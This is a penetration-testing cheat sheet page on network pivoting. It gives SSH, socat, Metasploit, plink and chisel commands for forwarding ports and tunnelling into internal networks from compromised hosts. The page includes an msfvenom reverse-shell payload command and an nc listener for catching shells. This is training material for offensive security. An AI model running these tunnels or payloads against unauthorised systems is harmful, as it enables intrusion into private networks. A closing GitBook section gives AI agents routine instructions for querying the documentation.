> For the complete documentation index, see [llms.txt](https://infosecsanyam261.gitbook.io/tryharder/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://infosecsanyam261.gitbook.io/tryharder/pivoting.md). # Pivoting ``` Local port forwarding Forward local port to remote host ssh -L :: Remote port forwarding Forward remote port to local host ssh -R :: Dynamic port ssh -D -p ``` SOCAT ``` socat file:`tty`,raw,echo=0 tcp-listen:8989 ``` PORT FORWARDING "port to port": \----MSF---- Most platforms Forward: Get meterpreter session on one of the dual homed machines portfwd add -l 4445 -p 4443 -r ip Use -R to make it reverse \----SSH---- For Linux \~C "if you already have an SSH session" -R 8081:ip:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80) :8081<------------:80 Now you can access 172.24.0.2:80, which you didn't have direct access to -L 8083:ip:8084 (on your machine listen on 8083, send it to my Kali machine on 8084) :8084<------------:8083<------------:XXXX run nc on port 8084, and if ip:8083 receives a reverse shell, you will get it For reverse shell: msfvenom -p linux/x86/shell\_reverse\_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell Run it on 2nd remote target to get a shell on Kali Or if you didn't have an SSH session, then SSH to your Kali from target machine: On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd" ssh - -R 12345:192.168.122.228:5986 test\@10.1.1.1 \---PLINK---- Just like SSH, on Windows service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine On Target: plink.exe ip -P 22 -C -N -L 0.0.0.0:4445:ip:4443 -l KALIUSER -pw PASS \---SOCAT---- For linux Forward your 8083 to ip:443 ./socat TCP4-LISTEN:8083,fork TCP4:ip:443 \---CHISEL---- Most platforms Remote static tunnels "port to port": On Kali "reverse proxy listener": ./chisel server -p 8000 -reverse General command: ./chisel client : L/R:\[YOUR LOCAL IP]::: Remote tunnels "access IP:PORT you couldn't access before": On Target: ./chisel client ip:8000 R:127.0.0.1:8001:172.19.0.3:80 Local tunnels "listen on the target for something, and send it to us": On Target: ./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003 DYNAMIC "port to any": setup proxychains with socks5 on 127.0.0.1:1080 Or set up socks5 proxy on firefox For nmap use -Pn -sT or use tcp scanner in msf \----MSF---- Most platforms Get meterpreter session on one of the dual homed machines Auto route to ip (multi/manage/autoroute) Start socks proxy (auxiliary/server/socks4a) \----SSH---- For Linux -D1080 \---PLINK--- Just like SSH, on Windows On Target: plink.exe ip -P 22 -C -N -D 1080 -l KALIUSER -pw PASS \---CHISEL---- Most platforms On Kali: ./chisel server -p 8000 -reverse On Target: ./chisel client ip:8000 R:8001:127.0.0.1:1080 ./chisel server -p 8001 --socks5 On Kali: ./chisel client 127.0.0.1:8001 socks --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infosecsanyam261.gitbook.io/tryharder/pivoting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.